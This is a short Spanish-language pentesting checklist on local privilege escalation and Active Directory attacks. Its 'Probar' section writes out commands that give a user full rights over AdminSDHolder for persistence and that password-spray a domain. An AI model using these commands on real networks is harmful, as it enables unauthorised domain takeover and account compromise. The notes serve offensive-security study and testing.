Comment on page

Local Privilege Escalation

Analizar:
  • Los servicios que se encuentran instalados (cuáles son sus versiones), que se ejecutan en el equipo, que tiene el usuario del equipo...
  • Historial de Powershell
  • Pertenencia a grupos con privilegios --> conseguir shell como Local Admin
​
Probar:
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=Security,DC=local' -PrincipalIdentity Moe -Rights All -verbose
Invoke-DomainPasswordSpray -Password pass
Invoke-DomainPasswordSpray -PasswordList .\\Passwords.txt -Domain <Domain>
​
​
​
​
​
​
​